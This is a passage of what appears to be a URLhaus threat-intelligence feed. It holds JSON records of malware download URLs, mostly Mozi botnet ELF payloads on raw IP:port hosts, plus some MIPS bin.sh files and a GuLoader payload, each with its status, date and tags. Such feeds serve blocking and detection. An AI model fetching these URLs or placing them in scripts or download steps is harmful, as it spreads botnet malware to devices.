UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961332","urlhaus_reference":"https://urlhaus.abuse.ch/url/961332/","url":"http://39.77.229.65:55558/Mozi.m","url_status":"online","host":"39.77.229.65","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961333","urlhaus_reference":"https://urlhaus.abuse.ch/url/961333/","url":"http://27.209.112.112:60558/Mozi.m","url_status":"online","host":"27.209.112.112","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961334","urlhaus_reference":"https://urlhaus.abuse.ch/url/961334/","url":"http://222.139.17.39:59624/Mozi.m","url_status":"online","host":"222.139.17.39","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961335","urlhaus_reference":"https://urlhaus.abuse.ch/url/961335/","url":"http://42.230.100.168:39386/Mozi.m","url_status":"online","host":"42.230.100.168","date_added":"2021-01-14 19:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961322","urlhaus_reference":"https://urlhaus.abuse.ch/url/961322/","url":"http://182.121.78.100:46289/Mozi.m","url_status":"online","host":"182.121.78.100","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961323","urlhaus_reference":"https://urlhaus.abuse.ch/url/961323/","url":"http://139.190.238.2:34951/Mozi.m","url_status":"offline","host":"139.190.238.2","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961324","urlhaus_reference":"https://urlhaus.abuse.ch/url/961324/","url":"http://186.33.122.75:47594/Mozi.m","url_status":"online","host":"186.33.122.75","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961325","urlhaus_reference":"https://urlhaus.abuse.ch/url/961325/","url":"http://182.121.32.64:55792/Mozi.m","url_status":"online","host":"182.121.32.64","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961326","urlhaus_reference":"https://urlhaus.abuse.ch/url/961326/","url":"http://123.9.207.172:35271/Mozi.m","url_status":"online","host":"123.9.207.172","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961327","urlhaus_reference":"https://urlhaus.abuse.ch/url/961327/","url":"http://186.33.122.231:36300/Mozi.m","url_status":"offline","host":"186.33.122.231","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961328","urlhaus_reference":"https://urlhaus.abuse.ch/url/961328/","url":"http://182.121.128.242:60680/Mozi.m","url_status":"online","host":"182.121.128.242","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961329","urlhaus_reference":"https://urlhaus.abuse.ch/url/961329/","url":"http://175.172.66.144:51132/Mozi.a","url_status":"online","host":"175.172.66.144","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961330","urlhaus_reference":"https://urlhaus.abuse.ch/url/961330/","url":"http://182.116.99.242:39049/Mozi.m","url_status":"online","host":"182.116.99.242","date_added":"2021-01-14 19:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961321","urlhaus_reference":"https://urlhaus.abuse.ch/url/961321/","url":"http://117.248.62.107:57455/Mozi.m","url_status":"online","host":"117.248.62.107","date_added":"2021-01-14 19:49:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961320","urlhaus_reference":"https://urlhaus.abuse.ch/url/961320/","url":"http://117.222.172.10:32823/Mozi.m","url_status":"online","host":"117.222.172.10","date_added":"2021-01-14 19:49:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961318","urlhaus_reference":"https://urlhaus.abuse.ch/url/961318/","url":"http://101.20.171.255:44103/Mozi.a","url_status":"online","host":"101.20.171.255","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961319","urlhaus_reference":"https://urlhaus.abuse.ch/url/961319/","url":"http://117.211.62.72:36257/Mozi.m","url_status":"offline","host":"117.211.62.72","date_added":"2021-01-14 19:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961317","urlhaus_reference":"https://urlhaus.abuse.ch/url/961317/","url":"http://115.55.179.98:41921/bin.sh","url_status":"online","host":"115.55.179.98","date_added":"2021-01-14 19:45:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961316","urlhaus_reference":"https://urlhaus.abuse.ch/url/961316/","url":"http://182.113.226.63:50971/i","url_status":"online","host":"182.113.226.63","date_added":"2021-01-14 19:44:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961315","urlhaus_reference":"https://urlhaus.abuse.ch/url/961315/","url":"http://59.96.39.120:56339/Mozi.m","url_status":"offline","host":"59.96.39.120","date_added":"2021-01-14 19:36:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961314","urlhaus_reference":"https://urlhaus.abuse.ch/url/961314/","url":"http://221.15.198.146:52551/Mozi.m","url_status":"online","host":"221.15.198.146","date_added":"2021-01-14 19:36:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961312","urlhaus_reference":"https://urlhaus.abuse.ch/url/961312/","url":"http://182.126.93.114:35942/Mozi.m","url_status":"online","host":"182.126.93.114","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961313","urlhaus_reference":"https://urlhaus.abuse.ch/url/961313/","url":"http://188.19.182.164:39636/Mozi.a","url_status":"online","host":"188.19.182.164","date_added":"2021-01-14 19:36:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961310","urlhaus_reference":"https://urlhaus.abuse.ch/url/961310/","url":"http://59.0.6.131:53548/Mozi.m","url_status":"offline","host":"59.0.6.131","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961311","urlhaus_reference":"https://urlhaus.abuse.ch/url/961311/","url":"http://45.160.145.247:40967/Mozi.m","url_status":"online","host":"45.160.145.247","date_added":"2021-01-14 19:36:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961309","urlhaus_reference":"https://urlhaus.abuse.ch/url/961309/","url":"http://186.33.104.195:49471/Mozi.m","url_status":"online","host":"186.33.104.195","date_added":"2021-01-14 19:36:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961302","urlhaus_reference":"https://urlhaus.abuse.ch/url/961302/","url":"http://42.224.172.5:43937/Mozi.m","url_status":"online","host":"42.224.172.5","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961303","urlhaus_reference":"https://urlhaus.abuse.ch/url/961303/","url":"http://182.126.89.215:57992/Mozi.a","url_status":"online","host":"182.126.89.215","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961304","urlhaus_reference":"https://urlhaus.abuse.ch/url/961304/","url":"http://27.219.111.198:43603/Mozi.m","url_status":"online","host":"27.219.111.198","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961305","urlhaus_reference":"https://urlhaus.abuse.ch/url/961305/","url":"http://27.219.76.18:37157/Mozi.a","url_status":"online","host":"27.219.76.18","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961306","urlhaus_reference":"https://urlhaus.abuse.ch/url/961306/","url":"http://185.246.178.200:37229/Mozi.m","url_status":"online","host":"185.246.178.200","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961307","urlhaus_reference":"https://urlhaus.abuse.ch/url/961307/","url":"http://222.136.88.171:49104/Mozi.m","url_status":"online","host":"222.136.88.171","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961308","urlhaus_reference":"https://urlhaus.abuse.ch/url/961308/","url":"http://61.53.193.78:49575/Mozi.m","url_status":"online","host":"61.53.193.78","date_added":"2021-01-14 19:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961299","urlhaus_reference":"https://urlhaus.abuse.ch/url/961299/","url":"http://112.234.38.83:50000/Mozi.a","url_status":"online","host":"112.234.38.83","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961300","urlhaus_reference":"https://urlhaus.abuse.ch/url/961300/","url":"http://115.50.226.131:36251/Mozi.m","url_status":"online","host":"115.50.226.131","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961301","urlhaus_reference":"https://urlhaus.abuse.ch/url/961301/","url":"http://116.25.134.26:51932/Mozi.m","url_status":"online","host":"116.25.134.26","date_added":"2021-01-14 19:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961297","urlhaus_reference":"https://urlhaus.abuse.ch/url/961297/","url":"http://116.75.197.211:45660/Mozi.m","url_status":"online","host":"116.75.197.211","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961298","urlhaus_reference":"https://urlhaus.abuse.ch/url/961298/","url":"http://112.240.79.242:42478/Mozi.m","url_status":"online","host":"112.240.79.242","date_added":"2021-01-14 19:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961296","urlhaus_reference":"https://urlhaus.abuse.ch/url/961296/","url":"http://103.243.184.54:50726/Mozi.m","url_status":"online","host":"103.243.184.54","date_added":"2021-01-14 19:34:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961295","urlhaus_reference":"https://urlhaus.abuse.ch/url/961295/","url":"http://59.99.93.45:40256/i","url_status":"offline","host":"59.99.93.45","date_added":"2021-01-14 19:33:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961294","urlhaus_reference":"https://urlhaus.abuse.ch/url/961294/","url":"http://182.113.226.63:50971/bin.sh","url_status":"online","host":"182.113.226.63","date_added":"2021-01-14 19:29:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961293","urlhaus_reference":"https://urlhaus.abuse.ch/url/961293/","url":"https://realestatederivatives.com.ng/zx/janomo_hfWUGQvSPn0.bin","url_status":"online","host":"realestatederivatives.com.ng","date_added":"2021-01-14 19:24:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"abused_legit_malware","surbl":"not listed"},"reporter":"abuse_ch","larted":"true","tags":["encrypted","GuLoader"]} +{"id":"961291","urlhaus_reference":"https://urlhaus.abuse.ch/url/961291/","url":"http://59.97.169.164:33946/Mozi.m","url_status":"offline","host":"59.97.169.164","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961292","urlhaus_reference":"https://urlhaus.abuse.ch/url/961292/","url":"http://58.249.13.69:39990/Mozi.a","url_status":"online","host":"58.249.13.69","date_added":"2021-01-14 19:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961288","urlhaus_reference":"https://urlhaus.abuse.ch/url/961288/","url":"http://61.52.86.202:60558/Mozi.m","url_status":"online","host":"61.52.86.202","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961289","urlhaus_reference":"https://urlhaus.abuse.ch/url/961289/","url":"http://61.52.76.45:32989/Mozi.a","url_status":"online","host":"61.52.76.45","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961290","urlhaus_reference":"https://urlhaus.abuse.ch/url/961290/","url":"http://61.52.26.66:52458/Mozi.m","url_status":"online","host":"61.52.26.66","date_added":"2021-01-14 19:22:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961286","urlhaus_reference":"https://urlhaus.abuse.ch/url/961286/","url":"http://203.212.246.231:60735/Mozi.m","url_status":"online","host":"203.212.246.231","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961287","urlhaus_reference":"https://urlhaus.abuse.ch/url/961287/","url":"http://186.33.104.197:34755/Mozi.m","url_status":"online","host":"186.33.104.197","date_added":"2021-01-14 19:21:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961285","urlhaus_reference":"https://urlhaus.abuse.ch/url/961285/","url":"http://41.86.19.146:39290/Mozi.m","url_status":"offline","host":"41.86.19.146","date_added":"2021-01-14 19:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961279","urlhaus_reference":"https://urlhaus.abuse.ch/url/961279/","url":"http://182.126.86.107:56141/Mozi.m","url_status":"online","host":"182.126.86.107","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961280","urlhaus_reference":"https://urlhaus.abuse.ch/url/961280/","url":"http://182.117.77.236:40247/Mozi.a","url_status":"online","host":"182.117.77.236","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961281","urlhaus_reference":"https://urlhaus.abuse.ch/url/961281/","url":"http://61.53.42.182:36619/i","url_status":"offline","host":"61.53.42.182","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961282","urlhaus_reference":"https://urlhaus.abuse.ch/url/961282/","url":"http://125.41.141.246:43673/Mozi.m","url_status":"online","host":"125.41.141.246","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961283","urlhaus_reference":"https://urlhaus.abuse.ch/url/961283/","url":"http://125.42.123.186:55726/Mozi.m","url_status":"online","host":"125.42.123.186","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961284","urlhaus_reference":"https://urlhaus.abuse.ch/url/961284/","url":"http://182.119.86.244:59668/Mozi.m","url_status":"online","host":"182.119.86.244","date_added":"2021-01-14 19:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961278","urlhaus_reference":"https://urlhaus.abuse.ch/url/961278/","url":"http://117.194.150.198:34391/Mozi.m","url_status":"online","host":"117.194.150.198","date_added":"2021-01-14 19:19:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961277","urlhaus_reference":"https://urlhaus.abuse.ch/url/961277/","url":"http://117.242.209.61:49478/Mozi.m","url_status":"online","host":"117.242.209.61","date_added":"2021-01-14 19:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961276","urlhaus_reference":"https://urlhaus.abuse.ch/url/961276/","url":"http://117.247.200.34:54670/Mozi.m","url_status":"offline","host":"117.247.200.34","date_added":"2021-01-14 19:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961270","urlhaus_reference":"https://urlhaus.abuse.ch/url/961270/","url":"http://115.58.133.53:59599/Mozi.m","url_status":"online","host":"115.58.133.53","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961271","urlhaus_reference":"https://urlhaus.abuse.ch/url/961271/","url":"http://115.56.130.11:45189/Mozi.a","url_status":"online","host":"115.56.130.11","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961272","urlhaus_reference":"https://urlhaus.abuse.ch/url/961272/","url":"http://120.85.210.224:60805/Mozi.a","url_status":"online","host":"120.85.210.224","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961273","urlhaus_reference":"https://urlhaus.abuse.ch/url/961273/","url":"http://115.56.27.220:38888/Mozi.m","url_status":"online","host":"115.56.27.220","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961274","urlhaus_reference":"https://urlhaus.abuse.ch/url/961274/","url":"http://115.48.157.100:47869/Mozi.m","url_status":"online","host":"115.48.157.100","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961275","urlhaus_reference":"https://urlhaus.abuse.ch/url/961275/","url":"http://103.157.241.40:57478/Mozi.m","url_status":"online","host":"103.157.241.40","date_added":"2021-01-14 19:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961269","urlhaus_reference":"https://urlhaus.abuse.ch/url/961269/","url":"http://59.99.93.45:40256/bin.sh","url_status":"offline","host":"59.99.93.45","date_added":"2021-01-14 19:10:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} +{"id":"961268","urlhaus_reference":"https://urlhaus.abuse.ch/url/961268/","url":"http://60.161.45.175:49035/Mozi.m","url_status":"online","host":"60.161.45.175","date_added":"2021-01-14 19:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961266","urlhaus_reference":"https://urlhaus.abuse.ch/url/961266/","url":"http://61.54.215.77:41531/Mozi.m","url_status":"online","host":"61.54.215.77","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961267","urlhaus_reference":"https://urlhaus.abuse.ch/url/961267/","url":"http://59.99.41.229:49596/Mozi.a","url_status":"offline","host":"59.99.41.229","date_added":"2021-01-14 19:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961265","urlhaus_reference":"https://urlhaus.abuse.ch/url/961265/","url":"http://61.52.197.146:43584/Mozi.m","url_status":"online","host":"61.52.197.146","date_added":"2021-01-14 19:07:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961264","urlhaus_reference":"https://urlhaus.abuse.ch/url/961264/","url":"http://59.92.181.82:44976/Mozi.m","url_status":"offline","host":"59.92.181.82","date_added":"2021-01-14 19:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961259","urlhaus_reference":"https://urlhaus.abuse.ch/url/961259/","url":"http://58.249.75.46:51107/Mozi.m","url_status":"online","host":"58.249.75.46","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961260","urlhaus_reference":"https://urlhaus.abuse.ch/url/961260/","url":"http://42.227.162.7:33790/Mozi.m","url_status":"online","host":"42.227.162.7","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961261","urlhaus_reference":"https://urlhaus.abuse.ch/url/961261/","url":"http://219.157.26.241:58919/Mozi.m","url_status":"online","host":"219.157.26.241","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961262","urlhaus_reference":"https://urlhaus.abuse.ch/url/961262/","url":"http://59.93.21.48:40395/Mozi.m","url_status":"offline","host":"59.93.21.48","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961263","urlhaus_reference":"https://urlhaus.abuse.ch/url/961263/","url":"http://59.92.216.111:53510/Mozi.m","url_status":"online","host":"59.92.216.111","date_added":"2021-01-14 19:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961258","urlhaus_reference":"https://urlhaus.abuse.ch/url/961258/","url":"http://183.17.147.46:39115/Mozi.m","url_status":"online","host":"183.17.147.46","date_added":"2021-01-14 19:05:12 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961257","urlhaus_reference":"https://urlhaus.abuse.ch/url/961257/","url":"http://123.14.93.124:40713/Mozi.m","url_status":"online","host":"123.14.93.124","date_added":"2021-01-14 19:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961256","urlhaus_reference":"https://urlhaus.abuse.ch/url/961256/","url":"http://182.59.195.56:54811/Mozi.m","url_status":"online","host":"182.59.195.56","date_added":"2021-01-14 19:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961255","urlhaus_reference":"https://urlhaus.abuse.ch/url/961255/","url":"http://153.37.155.55:58269/Mozi.a","url_status":"online","host":"153.37.155.55","date_added":"2021-01-14 19:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961251","urlhaus_reference":"https://urlhaus.abuse.ch/url/961251/","url":"http://123.14.95.248:47985/Mozi.m","url_status":"online","host":"123.14.95.248","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961252","urlhaus_reference":"https://urlhaus.abuse.ch/url/961252/","url":"http://185.106.46.2:38107/Mozi.m","url_status":"online","host":"185.106.46.2","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} +{"id":"961253","urlhaus_reference":"https://urlhaus.abuse.ch/url/961253/","url":"http://123.14.180.59:50354/Mozi.m","url_status":"online","host":"123.14.180.59","date_added":"2021-01-14 19:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not 